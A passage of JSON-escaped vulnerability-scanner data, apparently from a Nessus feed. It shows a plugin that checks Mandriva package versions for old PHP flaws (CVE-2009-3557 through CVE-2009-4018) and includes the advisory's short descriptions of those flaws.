pkgname:\"php5-xsl\", pkgver:\"5.2.10.dfsg.1-2ubuntu6.3\")) flag++;\n\nif (flag)\n{\n security_report_v4(\n port : 0,\n severity : SECURITY_HOLE,\n extra : ubuntu_report_get()\n );\n exit(0);\n}\nelse\n{\n tested = ubuntu_pkg_tests_get();\n if (tested) audit(AUDIT_PACKAGE_NOT_AFFECTED, tested);\n else audit(AUDIT_PACKAGE_NOT_INSTALLED, \"libapache2-mod-php5 / libapache2-mod-php5filter / php-pear / php5 / etc\");\n}\n", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2021-01-07T11:52:24", "description": "Some vulnerabilities were discovered and corrected in php-5.2.11 :\n\nThe tempnam function in ext/standard/file.c in PHP 5.2.11 and earlier,\nand 5.3.x before 5.3.1, allows context-dependent attackers to bypass\nsafe_mode restrictions, and create files in group-writable or\nworld-writable directories, via the dir and prefix arguments\n(CVE-2009-3557).\n\nThe posix_mkfifo function in ext/posix/posix.c in PHP 5.2.11 and\nearlier, and 5.3.x before 5.3.1, allows context-dependent attackers 
to\nbypass open_basedir restrictions, and create FIFO files, via the\npathname and mode arguments, as demonstrated by creating a .htaccess\nfile (CVE-2009-3558).\n\nPHP 5.2.11, and 5.3.x before 5.3.1, does not restrict the number of\ntemporary files created when handling a multipart/form-data POST\nrequest, which allows remote attackers to cause a denial of service\n(resource exhaustion), and makes it easier for remote attackers to\nexploit local file inclusion vulnerabilities, via multiple requests,\nrelated to lack of support for the max_file_uploads directive\n(CVE-2009-4017).\n\nThe proc_open function in ext/standard/proc_open.c in PHP before\n5.2.11 and 5.3.x before 5.3.1 does not enforce the (1)\nsafe_mode_allowed_env_vars and (2) safe_mode_protected_env_vars\ndirectives, which allows context-dependent attackers to execute\nprograms with an arbitrary environment via the env parameter, as\ndemonstrated by a crafted value of the LD_LIBRARY_PATH environment\nvariable (CVE-2009-4018).\n\nIntermittent segfaults occurred on x86_64 with the latest phpmyadmin\nand with apache (#53735).\n\nAdditionally, some packages which require so, have been rebuilt and\nare being provided as updates.", "edition": 25, "published": "2010-07-30T00:00:00", "title": "Mandriva Linux Security Advisory : php (MDVSA-2009:303)", "type": "nessus", "bulletinFamily": "scanner", "cvelist": ["CVE-2009-3558", "CVE-2009-4018", "CVE-2009-4017", "CVE-2009-3557"], "modified": "2010-07-30T00:00:00", "cpe": ["p-cpe:/a:mandriva:linux:php-xmlwriter", "p-cpe:/a:mandriva:linux:php-fcgi", "p-cpe:/a:mandriva:linux:php-json", "p-cpe:/a:mandriva:linux:php-bcmath", "p-cpe:/a:mandriva:linux:php-gd", "p-cpe:/a:mandriva:linux:php-pdo", "p-cpe:/a:mandriva:linux:php-calendar", "p-cpe:/a:mandriva:linux:php-mbstring", "p-cpe:/a:mandriva:linux:php-mhash", "p-cpe:/a:mandriva:linux:php-filepro", "p-cpe:/a:mandriva:linux:php-sysvmsg", "p-cpe:/a:mandriva:linux:php-ming", "p-cpe:/a:mandriva:linux:php-ini", 
"p-cpe:/a:mandriva:linux:php-posix", "p-cpe:/a:mandriva:linux:php-cgi", "p-cpe:/a:mandriva:linux:php-pcntl", "p-cpe:/a:mandriva:linux:php-hash", "p-cpe:/a:mandriva:linux:php-zlib", "p-cpe:/a:mandriva:linux:php-openssl", "p-cpe:/a:mandriva:linux:php-soap", "p-cpe:/a:mandriva:linux:php-xml", "p-cpe:/a:mandriva:linux:php-ftp", "p-cpe:/a:mandriva:linux:php-dom", "p-cpe:/a:mandriva:linux:php-apc", "p-cpe:/a:mandriva:linux:php-curl", "p-cpe:/a:mandriva:linux:php-sasl", "p-cpe:/a:mandriva:linux:php-sysvsem", "p-cpe:/a:mandriva:linux:php-ctype", "p-cpe:/a:mandriva:linux:php-fam", "p-cpe:/a:mandriva:linux:php-sockets", "p-cpe:/a:mandriva:linux:php-gmp", "p-cpe:/a:mandriva:linux:php-sysvshm", "p-cpe:/a:mandriva:linux:php-dbase", "p-cpe:/a:mandriva:linux:php-pdo_pgsql", "p-cpe:/a:mandriva:linux:php-pdo_mysql", "p-cpe:/a:mandriva:linux:php-xmlrpc", "p-cpe:/a:mandriva:linux:php-idn", "p-cpe:/a:mandriva:linux:php-bz2", "p-cpe:/a:mandriva:linux:php-ldap", "p-cpe:/a:mandriva:linux:php-xsl", "p-cpe:/a:mandriva:linux:php-mcal", "p-cpe:/a:mandriva:linux:php-tidy", "p-cpe:/a:mandriva:linux:php-fileinfo", "p-cpe:/a:mandriva:linux:lib64php5_common5", "p-cpe:/a:mandriva:linux:php-ncurses", "p-cpe:/a:mandriva:linux:php-xmlreader", "p-cpe:/a:mandriva:linux:php-ssh2", "p-cpe:/a:mandriva:linux:php-cli", "p-cpe:/a:mandriva:linux:php-mssql", "p-cpe:/a:mandriva:linux:php-sqlite", "p-cpe:/a:mandriva:linux:apache-mod_php", "p-cpe:/a:mandriva:linux:php-session", "p-cpe:/a:mandriva:linux:php-readline", "cpe:/o:mandriva:linux:2009.1", "p-cpe:/a:mandriva:linux:php-pdo_sqlite", "p-cpe:/a:mandriva:linux:libphp5_common5", "p-cpe:/a:mandriva:linux:php-tokenizer", "p-cpe:/a:mandriva:linux:php-pgsql", "p-cpe:/a:mandriva:linux:php-recode", "p-cpe:/a:mandriva:linux:php-gettext", "p-cpe:/a:mandriva:linux:php-imap", "p-cpe:/a:mandriva:linux:php-iconv", "p-cpe:/a:mandriva:linux:php-devel", "p-cpe:/a:mandriva:linux:php-xdebug", "p-cpe:/a:mandriva:linux:php-pdo_dblib", "p-cpe:/a:mandriva:linux:php-exif", 
"p-cpe:/a:mandriva:linux:php-eaccelerator", "p-cpe:/a:mandriva:linux:php-odbc", "p-cpe:/a:mandriva:linux:php-pdo_odbc", "p-cpe:/a:mandriva:linux:php-snmp", "p-cpe:/a:mandriva:linux:php-mysql", "p-cpe:/a:mandriva:linux:php-pspell", "p-cpe:/a:mandriva:linux:php-optimizer", "p-cpe:/a:mandriva:linux:php-mime_magic", "p-cpe:/a:mandriva:linux:php-dbx", "p-cpe:/a:mandriva:linux:php-apc-admin", "p-cpe:/a:mandriva:linux:php-tclink", "p-cpe:/a:mandriva:linux:php-eaccelerator-admin", "p-cpe:/a:mandriva:linux:php-vld", "p-cpe:/a:mandriva:linux:php-filter", "p-cpe:/a:mandriva:linux:php-sybase", "p-cpe:/a:mandriva:linux:php-dio", "p-cpe:/a:mandriva:linux:php-wddx", "p-cpe:/a:mandriva:linux:php-xattr", "p-cpe:/a:mandriva:linux:php-dba", "p-cpe:/a:mandriva:linux:php-mcrypt", "p-cpe:/a:mandriva:linux:php-shmop", "p-cpe:/a:mandriva:linux:php-suhosin", "p-cpe:/a:mandriva:linux:php-mysqli", "p-cpe:/a:mandriva:linux:php-translit", "p-cpe:/a:mandriva:linux:php-zip"], "id": "MANDRIVA_MDVSA-2009-303.NASL", "href": "https://www.tenable.com/plugins/nessus/48159", "sourceData": "#%NASL_MIN_LEVEL 70300\n\n#\n# (C) Tenable Network Security, Inc.\n#\n# The descriptive text and package checks in this plugin were \n# extracted from Mandriva Linux Security Advisory MDVSA-2009:303. 
\n# The text itself is copyright (C) Mandriva S.A.\n#\n\ninclude('deprecated_nasl_level.inc');\ninclude('compat.inc');\n\nif (description)\n{\n script_id(48159);\n script_version(\"1.14\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2021/01/06\");\n\n script_cve_id(\"CVE-2009-3557\", \"CVE-2009-3558\", \"CVE-2009-4017\", \"CVE-2009-4018\");\n script_bugtraq_id(37079, 37138);\n script_xref(name:\"MDVSA\", value:\"2009:303\");\n\n script_name(english:\"Mandriva Linux Security Advisory : php (MDVSA-2009:303)\");\n script_summary(english:\"Checks rpm output for the updated packages\");\n\n script_set_attribute(\n attribute:\"synopsis\", \n value:\n\"The remote Mandriva Linux host is missing one or more security\nupdates.\"\n );\n script_set_attribute(\n attribute:\"description\", \n value:\n\"Some vulnerabilities were discovered and corrected in php-5.2.11 :\n\nThe tempnam function in ext/standard/file.c in PHP 5.2.11 and earlier,\nand 5.3.x before 5.3.1, allows context-dependent attackers to bypass\nsafe_mode restrictions, and create files in group-writable or\nworld-writable directories, via the dir and prefix arguments\n(CVE-2009-3557).\n\nThe posix_mkfifo function in ext/posix/posix.c in PHP 5.2.11 and\nearlier, and 5.3.x before 5.3.1, allows context-dependent attackers to\nbypass open_basedir restrictions, and create FIFO files, via the\npathname and mode arguments, as demonstrated by creating a .htaccess\nfile (CVE-2009-3558).\n\nPHP 5.2.11, and 5.3.x before 5.3.1, does not restrict the number of\ntemporary files created when handling a multipart/form-data POST\nrequest, which allows remote attackers to cause a denial of service\n(resource exhaustion), and makes it easier for remote attackers to\nexploit local file inclusion vulnerabilities, via multiple requests,\nrelated to lack of support for the max_file_uploads directive\n(CVE-2009-4017).\n\nThe proc_open function in ext/standard/proc_open.c in PHP before\n5.2.11 and 5.3.x before 
5.3.1 does not enforce the (1)\nsafe_mode_allowed_env_vars and (2) safe_mode_protected_env_vars\ndirectives, which allows context-dependent attackers to execute\nprograms with an arbitrary environment via the env parameter, as\ndemonstrated by a crafted value of the LD_LIBRARY_PATH environment\nvariable (CVE-2009-4018).\n\nIntermittent segfaults occurred on x86_64 with the latest phpmyadmin\nand with apache (#53735).\n\nAdditionally, some packages which require so, have been rebuilt and\nare being provided as updates.\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://qa.mandriva.com/53735\"\n );\n script_set_attribute(attribute:\"solution\", value:\"Update the affected packages.\");\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:L/Au:N/C:P/I:P/A:P\");\n script_set_cvss_temporal_vector(\"CVSS2#E:POC/RL:OF/RC:C\");\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n script_cwe_id(264);\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:mandriva:linux:apache-mod_php\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:mandriva:linux:lib64php5_common5\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:mandriva:linux:libphp5_common5\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:mandriva:linux:php-apc\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:mandriva:linux:php-apc-admin\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:mandriva:linux:php-bcmath\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:mandriva:linux:php-bz2\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:mandriva:linux:php-calendar\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:mandriva:linux:php-cgi\");\n script_set_attribute(attribute:\"cpe\", 
value:\"p-cpe:/a:mandriva:linux:php-cli\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:mandriva:linux:php-ctype\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:mandriva:linux:php-curl\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:mandriva:linux:php-dba\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:mandriva:linux:php-dbase\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:mandriva:linux:php-dbx\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:mandriva:linux:php-devel\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:mandriva:linux:php-dio\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:mandriva:linux:php-dom\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:mandriva:linux:php-eaccelerator\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:mandriva:linux:php-eaccelerator-admin\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:mandriva:linux:php-exif\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:mandriva:linux:php-fam\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:mandriva:linux:php-fcgi\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:mandriva:linux:php-fileinfo\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:mandriva:linux:php-filepro\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:mandriva:linux:php-filter\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:mandriva:linux:php-ftp\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:mandriva:linux:php-gd\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:mandriva:linux:php-gettext\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:mandriva:linux:php-gmp\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:mandriva:linux:php-hash\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:mandriva:linux:php-iconv\");\n 
script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:mandriva:linux:php-idn\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:mandriva:linux:php-imap\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:mandriva:linux:php-ini\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:mandriva:linux:php-json\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:mandriva:linux:php-ldap\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:mandriva:linux:php-mbstring\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:mandriva:linux:php-mcal\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:mandriva:linux:php-mcrypt\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:mandriva:linux:php-mhash\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:mandriva:linux:php-mime_magic\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:mandriva:linux:php-ming\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:mandriva:linux:php-mssql\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:mandriva:linux:php-mysql\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:mandriva:linux:php-mysqli\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:mandriva:linux:php-ncurses\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:mandriva:linux:php-odbc\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:mandriva:linux:php-openssl\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:mandriva:linux:php-optimizer\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:mandriva:linux:php-pcntl\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:mandriva:linux:php-pdo\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:mandriva:linux:php-pdo_dblib\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:mandriva:linux:php-pdo_mysql\");\n script_set_attribute(attribute:\"cpe\", 
value:\"p-cpe:/a:mandriva:linux:php-pdo_odbc\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:mandriva:linux:php-pdo_pgsql\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:mandriva:linux:php-pdo_sqlite\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:mandriva:linux:php-pgsql\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:mandriva:linux:php-posix\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:mandriva:linux:php-pspell\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:mandriva:linux:php-readline\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:mandriva:linux:php-recode\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:mandriva:linux:php-sasl\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:mandriva:linux:php-session\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:mandriva:linux:php-shmop\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:mandriva:linux:php-snmp\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:mandriva:linux:php-soap\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:mandriva:linux:php-sockets\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:mandriva:linux:php-sqlite\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:mandriva:linux:php-ssh2\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:mandriva:linux:php-suhosin\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:mandriva:linux:php-sybase\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:mandriva:linux:php-sysvmsg\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:mandriva:linux:php-sysvsem\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:mandriva:linux:php-sysvshm\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:mandriva:linux:php-tclink\");\n script_set_attribute(attribute:\"cpe\", 
value:\"p-cpe:/a:mandriva:linux:php-tidy\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:mandriva:linux:php-tokenizer\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:mandriva:linux:php-translit\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:mandriva:linux:php-vld\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:mandriva:linux:php-wddx\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:mandriva:linux:php-xattr\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:mandriva:linux:php-xdebug\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:mandriva:linux:php-xml\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:mandriva:linux:php-xmlreader\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:mandriva:linux:php-xmlrpc\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:mandriva:linux:php-xmlwriter\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:mandriva:linux:php-xsl\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:mandriva:linux:php-zip\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:mandriva:linux:php-zlib\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:mandriva:linux:2009.1\");\n\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2009/11/28\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2010/07/30\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_copyright(english:\"This script is Copyright (C) 2010-2021 and is owned by Tenable, Inc. 
or an Affiliate thereof.\");\n script_family(english:\"Mandriva Local Security Checks\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/local_checks_enabled\", \"Host/cpu\", \"Host/Mandrake/release\", \"Host/Mandrake/rpm-list\");\n\n exit(0);\n}\n\n\ninclude(\"audit.inc\");\ninclude(\"global_settings.inc\");\ninclude(\"rpm.inc\");\n\n\nif (!get_kb_item(\"Host/local_checks_enabled\")) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\nif (!get_kb_item(\"Host/Mandrake/release\")) audit(AUDIT_OS_NOT, \"Mandriva / Mandake Linux\");\nif (!get_kb_item(\"Host/Mandrake/rpm-list\")) audit(AUDIT_PACKAGE_LIST_MISSING);\n\ncpu = get_kb_item(\"Host/cpu\");\nif (isnull(cpu)) audit(AUDIT_UNKNOWN_ARCH);\nif (cpu !~ \"^(amd64|i[3-6]86|x86_64)$\") audit(AUDIT_LOCAL_CHECKS_NOT_IMPLEMENTED, \"Mandriva / Mandrake Linux\", cpu);\n\n\nflag = 0;\nif (rpm_check(release:\"MDK2009.1\", reference:\"apache-mod_php-5.2.11-0.2mdv2009.1\", yank:\"mdv\")) flag++;\nif (rpm_check(release:\"MDK2009.1\", cpu:\"x86_64\", reference:\"lib64php5_common5-5.2.11-0.2mdv2009.1\", yank:\"mdv\")) flag++;\nif (rpm_check(release:\"MDK2009.1\", cpu:\"i386\", reference:\"libphp5_common5-5.2.11-0.2mdv2009.1\", yank:\"mdv\")) flag++;\nif (rpm_check(release:\"MDK2009.1\", reference:\"php-apc-3.1.3p1-0.1mdv2009.1\", yank:\"mdv\")) flag++;\nif (rpm_check(release:\"MDK2009.1\", reference:\"php-apc-admin-3.1.3p1-0.1mdv2009.1\", yank:\"mdv\")) flag++;\nif (rpm_check(release:\"MDK2009.1\", reference:\"php-bcmath-5.2.11-0.2mdv2009.1\", yank:\"mdv\")) flag++;\nif (rpm_check(release:\"MDK2009.1\", reference:\"php-bz2-5.2.11-0.2mdv2009.1\", yank:\"mdv\")) flag++;\nif (rpm_check(release:\"MDK2009.1\", reference:\"php-calendar-5.2.11-0.2mdv2009.1\", yank:\"mdv\")) flag++;\nif (rpm_check(release:\"MDK2009.1\", reference:\"php-cgi-5.2.11-0.2mdv2009.1\", yank:\"mdv\")) flag++;\nif (rpm_check(release:\"MDK2009.1\", reference:\"php-cli-5.2.11-0.2mdv2009.1\", yank:\"mdv\")) flag++;\nif 
(rpm_check(release:\"MDK2009.1\", reference:\"php-ctype-5.2.11-0.2mdv2009.1\", yank:\"mdv\")) flag++;\nif (rpm_check(release:\"MDK2009.1\", reference:\"php-curl-5.2.11-0.2mdv2009.1\", yank:\"mdv\")) flag++;\nif (rpm_check(release:\"MDK2009.1\", reference:\"php-dba-5.2.11-0.2mdv2009.1\", yank:\"mdv\")) flag++;\nif (rpm_check(release:\"MDK2009.1\", reference:\"php-dbase-5.2.11-0.2mdv2009.1\", yank:\"mdv\")) flag++;\nif (rpm_check(release:\"MDK2009.1\", reference:\"php-dbx-1.1.0-26.1mdv2009.1\", yank:\"mdv\")) flag++;\nif (rpm_check(release:\"MDK2009.1\", reference:\"php-devel-5.2.11-0.2mdv2009.1\", yank:\"mdv\")) flag++;\nif (rpm_check(release:\"MDK2009.1\", reference:\"php-dio-0.0.2-3.1mdv2009.1\", yank:\"mdv\")) flag++;\nif (rpm_check(release:\"MDK2009.1\", reference:\"php-dom-5.2.11-0.2mdv2009.1\", yank:\"mdv\")) flag++;\nif (rpm_check(release:\"MDK2009.1\", reference:\"php-eaccelerator-0.9.5.3-8.1mdv2009.1\", yank:\"mdv\")) flag++;\nif (rpm_check(release:\"MDK2009.1\", reference:\"php-eaccelerator-admin-0.9.5.3-8.1mdv2009.1\", yank:\"mdv\")) flag++;\nif (rpm_check(release:\"MDK2009.1\", reference:\"php-exif-5.2.11-0.2mdv2009.1\", yank:\"mdv\")) flag++;\nif (rpm_check(release:\"MDK2009.1\", reference:\"php-fam-5.0.1-7.1mdv2009.1\", yank:\"mdv\")) flag++;\nif (rpm_check(release:\"MDK2009.1\", reference:\"php-fcgi-5.2.11-0.2mdv2009.1\", yank:\"mdv\")) flag++;\nif (rpm_check(release:\"MDK2009.1\", reference:\"php-fileinfo-1.0.4-15.1mdv2009.1\", yank:\"mdv\")) flag++;\nif (rpm_check(release:\"MDK2009.1\", reference:\"php-filepro-5.1.6-17.1mdv2009.1\", yank:\"mdv\")) flag++;\nif (rpm_check(release:\"MDK2009.1\", reference:\"php-filter-5.2.11-0.2mdv2009.1\", yank:\"mdv\")) flag++;\nif (rpm_check(release:\"MDK2009.1\", reference:\"php-ftp-5.2.11-0.2mdv2009.1\", yank:\"mdv\")) flag++;\nif (rpm_check(release:\"MDK2009.1\", reference:\"php-gd-5.2.11-0.2mdv2009.1\", yank:\"mdv\")) flag++;\nif (rpm_check(release:\"MDK2009.1\", reference:\"php-gettext-5.2.11-0.2mdv2009.1\", 
yank:\"mdv\")) flag++;\nif (rpm_check(release:\"MDK2009.1\", reference:\"php-gmp-5.2.11-0.2mdv2009.1\", yank:\"mdv\")) flag++;\nif (rpm_check(release:\"MDK2009.1\", reference:\"php-hash-5.2.11-0.2mdv2009.1\", yank:\"mdv\")) flag++;\nif (rpm_check(release:\"MDK2009.1\", reference:\"php-iconv-5.2.11-0.2mdv2009.1\", yank:\"mdv\")) flag++;\nif (rpm_check(release:\"MDK2009.1\", reference:\"php-idn-1.2b-15.1mdv2009.1\", yank:\"mdv\")) flag++;\nif (rpm_check(release:\"MDK2009.1\", reference:\"php-imap-5.2.11-0.2mdv2009.1\", yank:\"mdv\")) flag++;\nif (rpm_check(release:\"MDK2009.1\", reference:\"php-ini-5.2.11-0.2mdv2009.1\", yank:\"mdv\")) flag++;\nif (rpm_check(release:\"MDK2009.1\", reference:\"php-json-5.2.11-0.2mdv2009.1\", yank:\"mdv\")) flag++;\nif (rpm_check(release:\"MDK2009.1\", reference:\"php-ldap-5.2.11-0.2mdv2009.1\", yank:\"mdv\")) flag++;\nif (rpm_check(release:\"MDK2009.1\", reference:\"php-mbstring-5.2.11-0.2mdv2009.1\", yank:\"mdv\")) flag++;\nif (rpm_check(release:\"MDK2009.1\", reference:\"php-mcal-0.6-27.1mdv2009.1\", yank:\"mdv\")) flag++;\nif (rpm_check(release:\"MDK2009.1\", reference:\"php-mcrypt-5.2.11-0.2mdv2009.1\", yank:\"mdv\")) flag++;\nif (rpm_check(release:\"MDK2009.1\", reference:\"php-mhash-5.2.11-0.2mdv2009.1\", yank:\"mdv\")) flag++;\nif (rpm_check(release:\"MDK2009.1\", reference:\"php-mime_magic-5.2.11-0.2mdv2009.1\", yank:\"mdv\")) flag++;\nif (rpm_check(release:\"MDK2009.1\", reference:\"php-ming-5.2.11-0.2mdv2009.1\", yank:\"mdv\")) flag++;\nif (rpm_check(release:\"MDK2009.1\", reference:\"php-mssql-5.2.11-0.2mdv2009.1\", yank:\"mdv\")) flag++;\nif (rpm_check(release:\"MDK2009.1\", reference:\"php-mysql-5.2.11-0.2mdv2009.1\", yank:\"mdv\")) flag++;\nif (rpm_check(release:\"MDK2009.1\", reference:\"php-mysqli-5.2.11-0.2mdv2009.1\", yank:\"mdv\")) flag++;\nif (rpm_check(release:\"MDK2009.1\", reference:\"php-ncurses-5.2.11-0.2mdv2009.1\", yank:\"mdv\")) flag++;\nif (rpm_check(release:\"MDK2009.1\", 
reference:\"php-odbc-5.2.11-0.2mdv2009.1\", yank:\"mdv\")) flag++;\nif (rpm_check(release:\"MDK2009.1\", reference:\"php-openssl-5.2.11-0.2mdv2009.1\", yank:\"mdv\")) flag++;\nif (rpm_check(release:\"MDK2009.1\", reference:\"php-optimizer-0.1-0.alpha1.5.1mdv2009.1\", yank:\"mdv\")) flag++;\nif (rpm_check(release:\"MDK2009.1\", reference:\"php-pcntl-5.2.11-0.2mdv2009.1\", yank:\"mdv\")) flag++;\nif (rpm_check(release:\"MDK2009.1\", reference:\"php-pdo-5.2.11-0.2mdv2009.1\", yank:\"mdv\")) flag++;\nif (rpm_check(release:\"MDK2009.1\", reference:\"php-pdo_dblib-5.2.11-0.2mdv2009.1\", yank:\"mdv\")) flag++;\nif (rpm_check(release:\"MDK2009.1\", reference:\"php-pdo_mysql-5.2.11-0.2mdv2009.1\", yank:\"mdv\")) flag++;\nif (rpm_check(release:\"MDK2009.1\", reference:\"php-pdo_odbc-5.2.11-0.2mdv2009.1\", yank:\"mdv\")) flag++;\nif (rpm_check(release:\"MDK2009.1\", reference:\"php-pdo_pgsql-5.2.11-0.2mdv2009.1\", yank:\"mdv\")) flag++;\nif (rpm_check(release:\"MDK2009.1\", reference:\"php-pdo_sqlite-5.2.11-0.2mdv2009.1\", yank:\"mdv\")) flag++;\nif (rpm_check(release:\"MDK2009.1\", reference:\"php-pgsql-5.2.11-0.2mdv2009.1\", yank:\"mdv\")) flag++;\nif (rpm_check(release:\"MDK2009.1\", reference:\"php-posix-5.2.11-0.2mdv2009.1\", yank:\"mdv\")) flag++;\nif (rpm_check(release:\"MDK2009.1\", reference:\"php-pspell-5.2.11-0.2mdv2009.1\", yank:\"mdv\")) flag++;\nif (rpm_check(release:\"MDK2009.1\", reference:\"php-readline-5.2.11-0.2mdv2009.1\", yank:\"mdv\")) flag++;\nif (rpm_check(release:\"MDK2009.1\", reference:\"php-recode-5.2.11-0.2mdv2009.1\", yank:\"mdv\")) flag++;\nif (rpm_check(release:\"MDK2009.1\", reference:\"php-sasl-0.1.0-25.1mdv2009.1\", yank:\"mdv\")) flag++;\nif (rpm_check(release:\"MDK2009.1\", reference:\"php-session-5.2.11-0.2mdv2009.1\", yank:\"mdv\")) flag++;\nif (rpm_check(release:\"MDK2009.1\", reference:\"php-shmop-5.2.11-0.2mdv2009.1\", yank:\"mdv\")) flag++;\nif (rpm_check(release:\"MDK2009.1\", reference:\"php-snmp-5.2.11-0.2mdv2009.1\", 
